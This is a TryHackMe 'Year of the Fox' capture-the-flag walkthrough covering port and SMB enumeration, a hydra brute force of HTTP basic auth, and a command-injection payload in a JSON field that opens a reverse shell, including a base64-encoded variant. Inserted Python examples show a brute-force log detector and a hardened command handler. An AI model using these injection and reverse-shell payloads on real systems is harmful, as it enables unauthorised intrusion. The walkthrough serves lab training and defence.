Year of the Fox [Tryhackme]

✔️ Information gathering:

┌──(root💀kali)-[~]
└─# rustscan -a 10.10.75.135 --ulimit 5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.🐢
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.75.135:80
Open 10.10.75.135:139
Open 10.10.75.135:445
┌──(root💀kali)-[~]
└─# nmap -sC -sV 10.10.75.135 -p 139,445,80
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-05 02:15 EST
Nmap scan report for 10.10.75.135
Host is up (0.31s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=You want in? Gotta guess the password!
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 401 Unauthorized
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: YEAROFTHEFOX)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: YEAROFTHEFOX)
Service Info: Hosts: year-of-the-fox.lan, YEAR-OF-THE-FOX
Host script results:
|_clock-skew: mean: 3s, deviation: 0s, median: 2s
|_nbstat: NetBIOS name: YEAR-OF-THE-FOX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: year-of-the-fox
| NetBIOS computer name: YEAR-OF-THE-FOX\x00
| Domain name: lan
| FQDN: year-of-the-fox.lan
|_ System time: 2021-12-05T07:15:58+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-12-05T07:15:58
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.40 seconds
┌──(root💀kali)-[~]
└─# smbclient -L 10.10.75.135
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
yotf Disk Fox's Stuff -- keep out!
IPC$ IPC IPC Service (year-of-the-fox server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
┌──(root💀kali)-[~]
└─# smbclient -U 'guest' \\\\10.10.75.135\\yotf
Enter WORKGROUP\guest's password:
tree connect failed: NT_STATUS_ACCESS_DENIED
GET / HTTP/1.1
Host: 10.10.75.135
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
S-1-5-21-978893743-2663913856-222388731-1049 *unknown*\*unknown* (8)
S-1-5-21-978893743-2663913856-222388731-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\fox (Local User)
S-1-22-1-1001 Unix User\rascal (Local User)
  • fox
  • rascal
┌──(root💀kali)-[~]
└─# hydra -l rascal -P /usr/share/wordlists/rockyou.txt 10.10.75.135 http-get -t 64
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-05 04:19:19
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking http-get://10.10.75.135:80/
[80][http-get] host: 10.10.75.135 login: rascal password: underground
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-05 04:20:19
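The hydra run above leaves a very recognisable trace on the server: a burst of 401 responses from one source against the basic-auth realm, followed by a 200 with an authenticated user once a guess lands. As an added defender-side example (not part of the original post), the detector below parses constructed Apache combined-format lines modelled on that run, flags any source with a burst of 401s inside a time window, and reports whether an authenticated 200 followed. The log lines, IPs and User-Agent strings are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Apache access-log sample: five 401s in three seconds from one
# source, then a 200 for user "rascal"; a second source fails once, then logs in.
SAMPLE_LOG = """\
10.17.9.224 - - [05/Dec/2021:04:19:20 -0500] "GET / HTTP/1.1" 401 459 "-" "Mozilla/5.0 (Hydra)"
10.17.9.224 - - [05/Dec/2021:04:19:20 -0500] "GET / HTTP/1.1" 401 459 "-" "Mozilla/5.0 (Hydra)"
10.17.9.224 - - [05/Dec/2021:04:19:21 -0500] "GET / HTTP/1.1" 401 459 "-" "Mozilla/5.0 (Hydra)"
10.17.9.224 - - [05/Dec/2021:04:19:21 -0500] "GET / HTTP/1.1" 401 459 "-" "Mozilla/5.0 (Hydra)"
10.17.9.224 - - [05/Dec/2021:04:19:22 -0500] "GET / HTTP/1.1" 401 459 "-" "Mozilla/5.0 (Hydra)"
10.17.9.224 - rascal [05/Dec/2021:04:19:22 -0500] "GET / HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (Hydra)"
10.10.0.7 - - [05/Dec/2021:04:19:25 -0500] "GET / HTTP/1.1" 401 459 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.10.0.7 - rascal [05/Dec/2021:04:19:40 -0500] "GET / HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

# Combined log format: ip ident user [timestamp] "request" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})'
)

def parse(log_text):
    """Yield (ip, timestamp, status, user) for each well-formed line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
            yield m["ip"], ts, int(m["status"]), m["user"]

def find_bruteforce(log_text, threshold=5, window_s=60):
    """Return {ip: {...}} for sources with >= threshold 401s inside window_s seconds.
    success_user is set when an authenticated 200 follows the last failure."""
    events = defaultdict(list)
    for ip, ts, status, user in parse(log_text):
        events[ip].append((ts, status, user))
    hits = {}
    for ip, evs in events.items():
        evs.sort()
        fails = [ts for ts, st, _ in evs if st == 401]
        # Sliding window: any `threshold` consecutive failures within window_s.
        burst = any((fails[i + threshold - 1] - fails[i]).total_seconds() <= window_s
                    for i in range(len(fails) - threshold + 1))
        if not burst:
            continue
        after = [u for ts, st, u in evs if st == 200 and u != "-" and ts >= fails[-1]]
        hits[ip] = {"failures": len(fails), "success_user": after[0] if after else None}
    return hits
```

The threshold and window are tunable; a single 401 followed by a login (the second source) is a typo, not an attack, and is correctly left alone.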
┌──(root💀kali)-[~]
└─# dirsearch -u http://10.10.75.135 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 200
_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 200 | Wordlist size: 20475
Output File: /root/.dirsearch/reports/10.10.75.135/_21-12-05_05-24-11.txt
Error Log: /root/.dirsearch/logs/errors-21-12-05_05-24-11.log
Target: http://10.10.75.135/
[05:24:12] Starting:
[05:25:36] 403 - 277B - /server-status

Task Completed
\";pwd \"
\";pwd\n

✔️ Exploitation [initial foothold]

\";sh -i >& /dev/tcp/10.17.9.224/9001 0>&1\n
nc -lvnp 9001
\";echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTcuOS4yMjQvOTAwMSAwPiYx|base64 -d |bash\n
{
"target":"\";echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTcuOS4yMjQvOTAwMSAwPiYx|base64 -d |bash\n"
}
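The payloads above work because the JSON "target" value ends up inside a double-quoted argument of a shell command: the quote closes the argument and the semicolon starts a second command. The room's real backend is not shown on the page, so the following is an added, hypothetical Python model (not the room's code): the vulnerable shape beside a hardened handler that validates the field against an allowlist and passes it as a single argv element, plus a request-logging check that flags shell metacharacters in the field. SEARCH_ROOT, the grep command and the allowlist are assumptions.

```python
import re
import subprocess

# Assumed search directory for the hypothetical backend.
SEARCH_ROOT = "/var/www/files"

def vulnerable_command(target: str) -> str:
    # Vulnerable shape: the untrusted field is spliced into a shell string, so a
    # double quote ends the argument and a semicolon starts a second command.
    return f'grep -rl "{target}" {SEARCH_ROOT}'

# Allowlist for what a legitimate search term may contain (assumption).
TARGET_RE = re.compile(r"[A-Za-z0-9._ -]{1,64}")

def validate_target(target: str) -> str:
    # Reject anything outside the allowlist rather than trying to escape it.
    if not TARGET_RE.fullmatch(target):
        raise ValueError("target contains characters outside the allowlist")
    return target

def safe_argv(target: str) -> list:
    # Hardened shape: the value is one argv element and no shell ever parses it;
    # "--" stops grep from reading a leading "-" in the term as an option.
    return ["grep", "-rl", "--", validate_target(target), SEARCH_ROOT]

def run_search(target: str) -> subprocess.CompletedProcess:
    # Executes without shell=True; raises ValueError before running on bad input.
    return subprocess.run(safe_argv(target), capture_output=True, text=True, check=False)

# Characters that only make sense if the caller is trying to reach the shell.
SHELL_META = ';&|`$"\'\\<>\n'

def looks_injected(target: str) -> bool:
    # Detection-side check for request logs: a strong signal even after the fix.
    return any(c in SHELL_META for c in target)
```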

✔️ Post exploitation:

Port 22 (SSH) is listening on localhost only.

./socat tcp-listen:8888,reuseaddr,fork tcp:localhost:22

✔️ Privilege escalation


enthusiast cyber security learner and penetration tester / ethical hacker , python programmer and in my free time you will find me solving CTFs
Surya Dev Singh